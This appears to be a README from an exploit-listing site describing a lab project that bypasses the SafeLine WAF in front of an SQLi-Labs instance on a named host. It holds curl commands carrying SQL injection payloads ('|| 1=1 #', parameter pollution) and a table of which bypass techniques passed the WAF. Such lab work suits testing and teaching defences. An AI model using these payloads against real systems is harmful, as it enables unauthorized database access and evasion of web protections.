Share
## https://sploitus.com/exploit?id=A0E3A5B2-E671-5511-B904-DEF30D3384C4
# SQLi-Labs WAF Bypass Project
> **Target**: `http://home.ctfstu.cn:6868/sql/Less-1/`
> **WAF Type**: Changting Leichei SafeLine (Community Edition)
> **Vulnerability Type**: SQL Injection (Error-Based โ String)
> **Testing Date**: 2026-07-08
> **Testing Tools**: Burp Suite / cURL
---
## Project Structure
```
sqlilabs-waf-bypass/
โโโ README.md # Project Description
โโโ REPORT.md # Complete Test Report
โโโ payloads/
โ โโโ successful.txt # Successful bypass payloads
โ โโโ blocked.txt # Payloads intercepted by WAF
โ โโโ all_payloads.txt # Summary of all tested payloads
โโโ screenshots/
โโโ (Screenshot Directory for Test Results)
```
## Environment Details
- ** Injection Point**: `GET /sql/Less-1/?id=1`
- ** Database**: MySQL
- ** WAF Version**: Changting Leichei SafeLine Community Edition
- ** Original SQL**: `SELECT * FROM users WHERE id='$id' LIMIT 0,1`
- ** Display Message**: `Your Login name:xxxYour Password:xxx`
---
## Quick Start
```bash
# 1. Normal Access
curl "http://home.ctfstu.cn:6868/sql/Less-1/?id=1"
# 2. Test WAF Interception (403 Error Returned When Interrupted)
curl "http://home.ctfstu.cn:6868/sql/Less-1/?id=1' OR '1'='1"
# 3. Operator Substitution to Bypass WAF
curl "http://home.ctfstu.cn:6868/sql/Less-1/?id=1' || 1=1 #"
# 4. HPP Parameter Pollution Bypass
curl "http://home.ctfstu.cn:6868/sql/Less-1/?id=1&id=2"
```
---
## Test Result Overview
| Bypass Technique | Status | Description |
|-----------------|-------|-------------|
| Operator substitution: `\|\|` instead of `OR` | โ
Successful | WAF does not intercept logical operators |
| Operator substitution: `&&` instead of `AND` | โ
Successful | WAF does not intercept logical operators |
| HPP parameter pollution | โ
Successful | WAF only checks the first parameter |
| Newline character `%0a` instead of space | โ
Successful | Can be used in `\|\|` injections |
| Split keywords from inline comments | โ ๏ธ Semi-Successful | Passed WAF but MySQL syntax error |
| Newline character `%0a` splits keywords | โ ๏ธ Semi-Successful | Passed WAF but MySQL syntax error |
| Mixed case | โ Failed | WAF does not distinguish between uppercase and lowercase |
| Double URL encoding | โ Failed | WAF performs deep decoding |
| Extremely long payloads | โ Failed | WAF checks all lengths |
| MySQL conditional comments | โ Failed | WAF does not parse `/*!...*/` |
See the complete analysis in [REPORT.md](./REPORT.md).